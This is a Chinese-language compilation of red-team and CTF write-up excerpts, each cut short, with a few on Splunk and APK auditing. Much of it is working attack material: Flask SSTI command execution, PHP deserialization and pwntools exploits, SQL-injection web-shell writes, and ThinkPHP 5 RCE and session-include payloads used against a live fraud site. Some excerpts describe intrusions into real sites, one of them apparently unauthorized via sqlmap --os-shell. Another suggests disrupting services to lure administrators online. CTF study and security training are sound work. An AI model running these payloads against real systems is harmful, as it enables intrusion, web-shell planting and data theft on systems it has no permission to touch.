红队攻击面相关讨论

一、查找备份文件1.通过https://github.com/maurosoria/dirsearch进行目录扫描python3 dirsearch.py -u http://10.10.10.175:32770 -e *2.最终获得index.php.bk备份文件，然后下载下来查看源码，即可获得flagflag为：Cyberpeace{855A1C4B3401294CB6604CCC98BDE334} 二、隐藏在cookie中的flag1.通过抓包工具对IP访问进行抓取http头部信息，发现cookie中包含信息：Cookie: look-here=cookie.php2.然后访问网址：http://220.249.52.133:41440/cookie.php,显示文字提示See the http response，说明flag有可能在响应包中3.对网址http://220.249.52.133:41440/cookie.php,进行请求，查看响应包，可看到flag信息4.最终flag为：cyberpeace{71de0ba3c98781d7f78c4af6e5b684be} 三、隐藏在按钮下的flag1.打开网址，http://220.249.52.133:52359/，发现按钮灰色，提示不能使用，这时候通过f12进行元素审核2.删除 disabled="" ，然后点击按钮即可获得flag3.最终flag为：cyberpeace{e61ed8f7f37f036a89f6d3c5622bb8e9}四、弱密码获得flag1.…

题目名称：从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景，获得题目靶场，访问网站，发现是一个文件上传漏洞，并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析：<?phpheader("Content-Type:text/html; charset=utf-8");// 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php，感觉这个php里面是有一些针对zip包进行解压等的操作的require_once('pclzip.lib.php'); //要是没上传文件，就输出上传页面if(!$_FILES){echo '省略的HTML' show_source(__FILE__);}else{ $file = $_FILES['file']; //限制上传的文件名不为空 if(!$file){ exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/';//strrchr($name, '.') //strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符。//比如上传的文件名为$name=1.php.txt，这里strrchr($name, '.') 执行结果为.txt//substr(strrchr($name, '.'), 1…

题目名称：Simple_SSTI_2题目wirteup:启动题目场景，获得靶场网站，访问网站，页面显示url连接需要连接一个 flag参数http://114.67.246.176:19131/根据题目内容，该题是一个ssti漏洞，这里构造ssti，参数构造flag={{3+2}}，报错，且是flaskhttp://114.67.246.176:19131/?flag={{3+2}} 又尝试构造flag={{3*2}},发现页面显示6.证明系统存在ssti漏洞http://114.67.246.176:19131/?flag={{3*2}}通过config变量查看flask的配置信息，并没有可利用点http://114.67.246.176:19131/?flag={{config}} 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件，这里读取网站系统目录，发现存在一些文件夹，一个个进入查看，发现第一个看的app文件夹里就有flag##__class__：用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。##__init__ 初始化类，返回的类型是function##__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。##os.popen() 方法用于从一个命令打开一个管道。##open(…

0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 0x01 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 0x02 堆叠注入的局限性堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。 此图是从原文中截取过来的，因为我个人的测试环境是php+mysql，是可以执行的，此处对于mysql/php存在质疑。但个人估计原…

0x00 初识splunk 一、公司： 美国Splunk公司，成立于2004年，2012年纳斯达克上市，第一家大数据上市公司，荣获众多奖项和殊荣。 总部位于美国旧金山，伦敦为国际总部，香港设有亚太支持中心，上海设有海外第一个研发中心。目前国内最大的客户许可是800GB/天。 产品：Splunk Enterprise【企业版】、Splunk Free【免费版】、Splunk Cloud、Splunk Hunk【大数据分析平台】、Splunk Apps【基于企业版的插件】等。 二、产品： Splunk Enterprise，企业版，B/S架构，按许可收费，即每天索引的数据量。 (购买20GB的许可，则默认每天可索引20G数据量；一次购买永久使用；如果使用试用版，试用期结束之后会切换到免费版) Splunk Free，免费版，每天最大数据索引量500MB，可使用绝大多数企业版功能。 （免费版没有例如：身份验证、分布式搜索、集群等功能） Splunk Universal Forwarder，通用转发器，是Splunk提供的数据采集组件，免费，部署在数据源端，无UI界面，非常轻量，占用资源小。 （转发器无许可证，是免费的；企业版专用的；所以部署在数据源，例如：部署在你的WEB服务器上，监控你的WEB日志，实时监控，产生一条日志则转发一条，进行增量转发；一般配置修改配置文件或者使用CLI命令。占用资源小） 三、Splunk是什么 面向机器数据的全文搜索引擎； （使用搜索引擎的方式处理数据；支持海量级数据处理） 准实时的日志…

一、客户端程序安全测试1.检查apk的信息 java -jar GetApkInfo.jar tfkj.apk 2.数字签名检查 C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe -verify C:\Users\bk\Desktop\天府科技云APP\天府科技云服务平台\天府科技云服务平台.apk C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe -verify C:\Users\bk\Desktop\天府科技云APP\天府科技云服务平台\天府科技云服务平台.apk -verbose -certs 开发者证书不规范，导致开发者身份信息不明 keytool.exe -printcert -file .\CERT.RSA 3.反编译检查 通过ApkScan.jar查看APP加固类型 apk反编译为Java源代码: 把 apk 当成 zip 并解压，得到 classes.dex 文件 将解压出来的classes.dex文件拷贝到dex2jar工具文件夹中 执行命令：d2j-dex2jar classes.dex 执行完毕后，得到反编译而来的classes-dex2jar.jar文件 使用jd-gui.exe或者luyten-0.5.4打开 classes-dex2jar.jar文件，得到360安全加固混淆加密的源代码。 apk编译为smali语言: java -jar …

MISC1 签到难度 签到 复制给出的flag输入即可 2 range_download难度 中等 flag{6095B134-5437-4B21-BE52-EDC46A276297} 0x01分析dns流量，发现dns && ip.addr=1.1.1.1存在dns隧道数据，整理后得到base64: cGFzc3dvcmQ6IG5zc195eWRzIQ== 解base64得到: password: nss_yyds! 0x02分析http流量，发现ip.addr==172.21.249.233存在http分段下载数据，每次按照请求头range要求只下载一个字节。由于是random下载，所以需要按顺序整理，整理后可以得到一个加密的压缩包。 在整理过程中会发现缺失2349位字节，需要尝试对其进行修复。 由于0x01中，我们得到了zip的密码，所以可以对该字节进行爆破，如果密码正确，则修复成功。 0x03解开压缩包得到二维码， 扫描后得到: 5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555570706344686957444d336544684c596c4255556e6333636e687165486c756446413…

0x00 Misc一、应该算是签到 二、Cthulhu Mythos 三、CyzCC_loves_LOL lovemath 0x01 Web一、EZ_TP <?php namespace think { class Request { protected $filter; protected $hook = []; protected $param = []; protected $config = []; public function __construct() { $this->filter = 'system'; $this->param = ['cat /*']; $this->hook = ['visible' => [$this, 'isAjax']]; $this->config = ['var_ajax' => '']; } } abstract class Model { private $data = []; protected $append = []; function __construct() { $thi…

WebHackMe开局一个文件上传，utf-16的编码绕过，然后根据提示爆破文件名 爆破最后四位 0000 - 9999， 就可以访问到了，注意是12小时。 PwnbabyropDEBUG # _*_ coding:utf-8 _*_ from pwn import * import numpy as np context.log_level = 'debug' #context.terminal=['tmux', 'splitw', '-h'] prog = './babyrop' #elf = ELF(prog) p = process(prog)#,env={"LD_PRELOAD":"./libc-2.27.so"}) libc = ELF("./libc-2.27.so") #p = remote("123.57.207.81",44823) def debug(addr,PIE=False): debug_str = "" if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) for i in addr: debug_str+='b *{}\n'.format(hex(text_base+i)) gdb.attach(p,debug_str) else: for i in…

CryptoVigenere在https://www.boxentriq.com/code-breaking/vigenere-cipher 网站爆破得到为key:asterism 解密得到falg。 或者 根据题目Vigenere可看出是维吉尼亚密码 使用在线解码工具破解 https://guballa.de/vigenere-solver flag：flag{53d613fc-6c5c-4dd6-b3ce-8bc867c6f648} PWNsupercall简单栈溢出，利用LibcSearcher通过题目泄露出的_IO_2_1_stdin_的真实地址找到 libc 基地址，用one_gatget 来get shell。 #!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @File : exp.py @Time : 2021/11/27 13:39:07 @Author : lexsd6 ''' from pwn import * from libcfind import * local_mote=0 elf='./supercall' e=ELF(elf) #context.log_level = 'debug' context.arch=e.arch ip_port=['123.57.207.81',16985] debug=lambda : gdb.attach(p) if local_mote==1 else None …

WebX1cT34m_API_System 考点：Springboot actuator配置不当导致的API安全问题 访问/actuator/mappings，可以看到有/actuator/jolokia(限制了本地IP，直接访问返回403)和一个隐藏的API接口/user/list。 或者可以直接拿APIKit扫到/user/list： POST访问/user/list，返回XML格式的数据 那么自然而然地想到了XXE；加了waf，不让直接读文件； (这里有俩师傅做了非预期,XXE的waf没写好,可以直接盲打外带flag,我在v2限制了靶机出网无法外带了) 但是众所周知，XXE是可以SSRF的； 那么SSRF配合/actuator/jolokia可以完成一次利用 因为是docker代理的端口，我们需要先访问/actuator/env获取本地服务端口： 然后构造SSRF： 因为/jolokia/list返回的数据太长了，而且里面有一些特殊符号会报XML document structures must start and end within the same entity.。 于是后面给了附件pom.xml，可以本地起起来看一下有什么Mbean。 有一个可以读写文件的Mbean： com.sun.management:type=DiagnosticCommand 判断远程环境是否存在这个Mbean： 如果不存在返回的是上图，如果存在返回的是下图两种情况 exp: POST /user/list HTTP/1.1 Host: localh…

WEBmmmmd5d5d5d5链接打开页面 绕过 ?a[]=1&b[]=2 构造md5 <?php for($i = 0 ; $i <= 100000 ; $i ++) { if (substr(md5($i) , 5, 5) === "3ddc6") { echo $i; break; } } ?> 进入到下一层 提交 ffifdyop 得到： <?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){ echo $flag; } 构造payload： param1[]=1&param2[]=2 即可得到flag EDGnb(签到)直接docker桌面版打开 即可得到flag 时光塔的宝藏链接打开一个login框 构造payload： pswd=admin&usname=admin' union select 1,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1203.php';# 蚁剑连1203.php，密码为1，即可得到flag LFI_to_RCE<?php show_source(…

Web1.Checkin解题思路 这道题 前面根据 源码应该是 nosql注入，我分析的payload：username='||1) {return true;}})//&password=123456 盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimport time import requests import string session = requests.session() chars = string.printable password = '' burp0_url = "http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81/login" burp0_headers = {"Cache-Control": "max-age=0", "Origin": "http://d8304b2c-689b-4b9f-844a-1c3358bb57de.node4.buuoj.cn:81", "Upgrade-Insecure-Requests": "1", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Sa…

Webeasywill解题思路 变量覆盖 http://eci-2zej1goyn9jh8hty6ton.cloudeci1.ichunqiu.com/?name=cfile&value=/etc/passwd P神博客最近的文章利用pearcmd：https://tttang.com/archive/1312/ Pentest in Autumn解题思路 http://eci-2ze40jm526y24nv2lkl3.cloudeci1.ichunqiu.com:8888/ 权限绕过 /;/actuator/env /;/actuator/heapdump 解密脚本 import base64 import struct print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -126,-67,24,-71,-62,-122,61,-52,91,77,-110,115,-43,100,-88,103))) #gr0YucKGPcxbTZJz1WSoZw== flag{3fa31850-8ee6-40f2-9b18-9ecf6cac176c} ReverseHideit解题思路 打开之后发现有SMC，单步调试总是找不到主函数 发现输出字符串，在puts下断点，第二次断下后回溯到主函数处，向上一直到函数头，反编译 __int64 __fastcall sub_24D61161BB0(__int64 a1) { //... if ( !(unsigned in…

签到题目内容是一个 pdf 文件，用 Adobe Acrobat 打开，看到其中包含一些特殊符号。 在编辑模式下，查看得到其字体为 Wingdings，这是一个装饰字体，文本内容其实是 ASCII 码。文本范围是超出页面的，resize 之后复制出其内容，给出了两行文字： 这是栅栏密码，得到 flag 为 flag{Have_A_Great_Time@GeekGame_v1!}。 fa{aeAGetTm@ekaev! lgHv__ra_ieGeGm_1} 小北问答 Remake北京大学燕园校区有理科 1 号楼到理科 X 号楼，但没有理科 (X+1) 号及之后的楼。X 是？ 在 Google Earth 中搜索，存在理科 5 号楼，但没有理科 6 号楼。故答案为 5。 上一届（第零届）比赛的总注册人数有多少？ 在北京大学新闻网中找到报道北京大学举办首届信息安全综合能力竞赛，得到「本次大赛共有 407 人注册参赛」，故答案为 407。 geekgame.pku.edu.cn 的 HTTPS 证书曾有一次忘记续期了，发生过期的时间是？ 搜索「ssl cert database」，找到网站 crt.sh。在该网站上搜索 geekgame.pku.edu.cn，并根据题目给出的正则表达式寻找过期时间秒数以 3 结尾的证书，得到证书 4362003382。其过期时间为 Jul 11 00:49:53 2021 GMT，将时区换为 UTC+8，得到 2021-07-11T08:49:53+08:00。 2020 年 DEFCON CTF 资格赛签到题的…

WEB 1.middle_magic %0a绕过第一关最后加%23是# 数组绕过第二关 json 弱类型比较 http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2.easy_sql_2登录功能，post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。username尝试-1'||'1'%23发现是password error!，因此猜测后端的应该是根据传入的username查出对应的password，查到了就不再是username error!，然后讲传入的password进行一次md5后与这个password比较，相同就登录成功。尝试SQL注入，但是ban了select，因此利用table注入。数据库名的话很好注入，直接不用table用regexp也可以注出是ctf了，然后开始注表名。虽然过滤了tables，但是columns没有过滤，可以利用informaion_schema.columns来盲注出表名：mysql8.0，table statement： 过滤了information_schema.table用mysql.innodb_table_stats admin'/**/and/**/(('ctf','%s',3,4,5,6)&lt…

概述 如果MSSQL数据库中开启了MSSQL Server Agent Job服务的话，攻击者将可以利用MSSQL Server中自带的功能来获取一个shell。 SQL Server Agent SQL Server Agent是一个Windows服务，它可以用来执行自动化任务。 攻击浅析 利用MSSQL Server中的本地功能来在Windows操作系统中执行任意命令。在整个测试过程中，xp_cmdshell存储过程已被禁用了，并且限制了创建自定义存储过程的能力。 当xp_cmdshell扩展存储过程在攻击中被使用时，大多数安全监控或检测系统都会产生警报。而攻击者和渗透测试人员对xp_cmdshell的滥用已经导致很多组织和企业开始禁用或限制xp_cmdshell了。 可利用MSSQL Server代理来在目标数据库服务器中执行任意控制命令。但是，目标服务器必须满足一下几个条件： 目标服务器必须开启了MSSQL Server代理服务； 服务器中当前运行的用户账号必须拥有足够的权限去创建并执行代理作业； 两个可以利用的MSSQL代理作业子系统：CmdExec和PowerShell子系统，这两个功能可以分别用来执行操作系统命令和PowerShell脚本。 http://rinige.com/usr/uploads/2016/10/4246109187.png 可以使用SQL注入点来创建并执行代理任务。任务所需执行的命令是一段PowerShell代码，这段代码可以让目标系统与一个受Optiv控制的IP地址进行通信连接，然后…

windows2016上如何通过攻击ETERNALBLUE获得meterpreter反弹 译：by backlion 0x00前言 当微软发布MS17-010漏洞的补丁时，该漏洞影响的范围是从Windows 7到Windows Server 2016系统版本。然而，The ShadowBrokers发布的永恒之蓝攻击是非常不稳定的，可能影响到Windows Server 2012和以后的操作系统版本，导致99％的机器受到永恒之蓝的攻击。为了理解并能更好地应用，NSA已发布的漏洞通过了许多安全研究人员的研究。正因为如此，几天前，已经发布了永恒之石SYNERGY的bug漏洞（由Sleepya开发的）。并改进了漏洞利用，使其在攻击Windows Server 2012和2016系统时更加稳定。但事实是，如果你想使用这个漏洞，需要进一步弄清楚是，当我们影响目标机器时，是否了解到真正的工作原理，以及需要修改一些代码，以获得我们所期望的目标是必然的。 这就是为什么在分析漏洞之后，我再次来发布另一个如何攻击windows2016的文章。通一步一步的步骤，作者将解释所有漏洞利用的问题，使得Sleepya发布的永恒之蓝漏洞能够正常的利用，以及如何修改其特征，以便在目标机器上获得一个meterpreter反弹shell. 0x01 漏洞利用 实验搭建环境： 要搭建的实验环境，我们需要配置以下主机： 目标主机-----Windows Server 2016（将使用Windows Server 2016 64位的机器作为目标主机） …

Web1.[强网先锋]寻宝下发赛题，访问链接如下： 该题需要你通过信息 1 和信息 2 分别获取两段 Key 值，输入 Key1 和 Key2 然后解密。 Key1之代码审计 点击“信息1”，发现是代码审计： 完整源码如下： <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); function filter($string){ $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'); $filter_phrase= '/'.implode('|',$filter_word).'/'; return preg_replace($filter_phrase,'',$string); } if($ppp){ unset($ppp); } $ppp['number1'] = "1"; $ppp['number2'] = "1"; $ppp['nunber3'] = "1"; $ppp['number4'] = '1'; $ppp['number5'] = '1'; extract($_POST); …

Web 1.esay_eval<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a->a(); } } if(isset($_REQUEST['poc'])){ preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret); if (isset($ret[1])) { foreach ($ret[1] as $i) { if(intval($i)!==1){ exit("you want to bypass wakeup ? no !"); } } unserialize($_REQUEST['poc']); } }else{ highlight_file(__F…

最近接到任务，调查一个诈骗团伙 上面有一个注册接口，直接先注册一个用户看看他们怎么诈骗的 好家伙，用户赚了8个亿，充值过的用户直呼内行。 这种站点一看就是那种诈骗团伙的杀猪盘，使用的那种tp5的框架一键搭建，方便又省事。后来根据报错信息的确是tp5.0.10的框架还开了debug模式，老杀猪盘了。 直接先用tp5rce打出phpinfo看 s=captcha _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo 看来禁的函数比较多，这个时候用tp5的rce和写shell就比较困难，使用tp5日志包含和session包含来getshell就十分的方便。 日志包含还需要去找文件，我这里就直接是session包含来getshell 先通过设置session会话并传入一句话木马 ?s=captcha _method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1 然后直接利用文件包含去包含session文件，tp5的session文件一般都是在/tmp下面，文件名为sess_sessionid ?s=captcha _method=__construct&method=get&filter[]=think\__include_file&…

0x01 信息搜集首先给定的目标为 xxx 大学官网:www.xxx.edu.cn，但是不要真的就只是对主站进行测试了，一般像这种主站都是比较安全的，大概率采用一些站群系统，像学校很多使用博达的统一管理，自带 waf 1.子域名采集可以通过 subdomain3,fuzzdomain，subDomainsBrute,seay 子域名爆破 但是上述的我在此次渗透中并未使用，爆破时间太长了. 我用的 fofa，shadon 这些个网络空间搜索引擎 比如下图： host="xxxx.edu.cn" 2.端口信息通过上面 fofa 的结果，得知 ip 地址，使用端口扫描工具扫描。未发现可利用端口 然而很多站点的 ip 都是这个，感觉像是做的反向代理 遂放弃端口 3.敏感信息搜集github 搜索google hacking凌风云网盘搜索然后并没有搜集到一些敏感的东西 邮箱使用的是腾讯的企业邮箱，vpn 是这个样子的 然后搜集到的部分邮箱账号如下图 通过浏览网站，搜集到部分内网系统 通过查看统一认证平台的提示和部分社工得知 学生用学号加身份证后 6 位 (默认密码) 可以登陆 于是呢 俺搜集了一波学号备用 site:xxx.edu.cn 学号 0x02 漏洞挖掘搜集了部分需要的信息，就开始对着各个子域名进行挖掘了，找了半天，大部分的系统都是采用的统一的模板，功能比较单一，并未发现什么漏洞 site:xxx.edu.cn inurl:login site:xxx.edu.cn intitle：登陆 然后我便把重心放在了一些登陆系统上 然后找到…

0X01 找到注入点故事的起因还是因为我太闲了，上班摸鱼。 摸着摸着就摸到了某个网站的查询框。 接着老毛病就犯了，上去就输入了个1查询 接着输入了1’ 啧啧啧，这明显有SQL注入哇。 果断掏出SQLMAP神器。 结局很完美，不仅存在注入，还是DBA的权限。 0X02 网站get shell利用SQL注入去get shell有几种常见的方法，一种是跑数据，跑目录找到网站的管理后台，进入到后台想办法通过文件上传的等方法去拿shell；要么就通过报错，phpinfo界面，404界面等一些方式知道网站绝对路径，然后去写入shell，不过相对于mysql来说条件还是有些苛刻的。 接着就是掏出御剑开始扫网站目录，目录还挺多。 随意点开了个admin 我去，竟然存在目录遍历。 接着又点开了00/ 一口老血喷出，这，还没开始就结束了？？？ 绝对路径不请自来，竟然还是最常见的路径，早知道直接--os-shell跑常见路径了-- 含泪拿着绝对路径，直接SQLMAP中--os-shell 这里有个点要了解一下，sqlmap中mysql数据库--os-shell的时候，sqlmap先写入一个文件上传shell tmpxxxx.php，再通过文件上传shell上传命令执行shell tmpxxxx.php，再利用命令执行shell执行命令。 具体可以去雨九九大佬博客学习一波。 https://www.cnblogs.com/Rain99-/p/13755496.html 所以这里我就直接用sqlmap文件上传的shell去上传我的shell了 …

0x01 前言当一个企业把他的业务放到腾讯云或阿里云等公有云的时候，其是与企业的内网是不相通的，相当于逻辑隔离了(非物理隔离)，如果企业信息安全做的相对较好，不暴露VPN地址或者路由器或防火墙业务，信息收集的时候，是很难进精准定位到企业的内网使用的公网地址的。这个时候，想要渗透内网相对困难。 下面就介绍一下我从公有云到渗透进内网进行漫游的实际渗透过程。 0x02 前期打点怎样拿下云服务器的不是本文重点，故不做详细介绍，只简单介绍思路。 根据公司名字，直接百度，发现官网地址。根据官网地址，进行了一波信息收集： 发现站点使用了CDN，是腾讯云主机，ip是变化的，无法探测真实IP；发现存在任意命令执行漏洞。直接RCE，拿下服务器权限；先看下ip地址 发现显示的是内网地址，这个时候，查看下真实的ip，虽然这个对接下来的内网渗透没什么diao用。 到此才发现是腾讯云，主机不在内网。 0x03 想办法打内网这个时候，我就要办法获取公司办公网的外网IP了，这个外网ip要么是防火墙的，要么是路由器的。怎么获取呢？我想到了一个办法，一般云主机，运维人员会通过ssh来进行管理，一般在上班时间，他们会连接进来，这个时候，就会获取到公司的真实公网IP。 教大家一个小技巧，如果是小公司，运维可能十天半个月都不会连上来，这个时候，我们就可以搞点“小破坏”，逼迫运维上线。 比如关闭它的web服务等等，大家千万注意两点： 动作不要太大，免得被运维发现被黑，当然你可以提前做权限维持，这里不做介绍；没有“授权”，千万不要乱搞；没有授权，千万不要乱搞；没有授权，千万不要乱搞，…

前言最近对云安全这块比较感兴趣，学了一波k8s的架构和操作，正好遇上了华为云的这一场比赛，收获颇多。 (甚至通过非预期拿下了平台题目集群的最高权限)。 0x00 题目入口发现拿到题目发现是一个类似于提供IaaS服务的站点，扫描了一波目录，发现几个文件以及路由: phpinfo.php robots.txt admin/ login/ static/挺奇怪的是，在一个存在phpinfo的环境下发现了一个beego框架后端的403界面： 初步猜测是.php的文件交给了nginx fastcgi进行处理，而其他路由则是交给了beego进行处理。 接着我们先看/admin路由，发现存在一个隐藏的表单 因此自然的想到使用burpsuite进行弱口令的爆破，发现存在弱口令 admin:admin 登录成功后返回了两个url， 下载 tools.zip，同时根据名字猜测/wsproxy是一个websocket的代理路由，而查看tools的源码发现是一个wsproxy的客户端程序。 至此，我们找到了进入内网的通道。 0x01 wsproxy 进入内网直接对拿到的tools源码进行编译，获得客户端连接程序 根据使用说明，我们可以通过简单的命令连接上题目的wsproxy,同时密码为tools源码目录下的 pass.txt(UAF)，session就是我们登陆admin后，题目给的beego session 这样会在本地的1080端口开启一个 socks5 代理，通过这个代理，我们就能够连入内网。 0x02 phpinfo泄露k8s集群信息由于这道题目的名称 …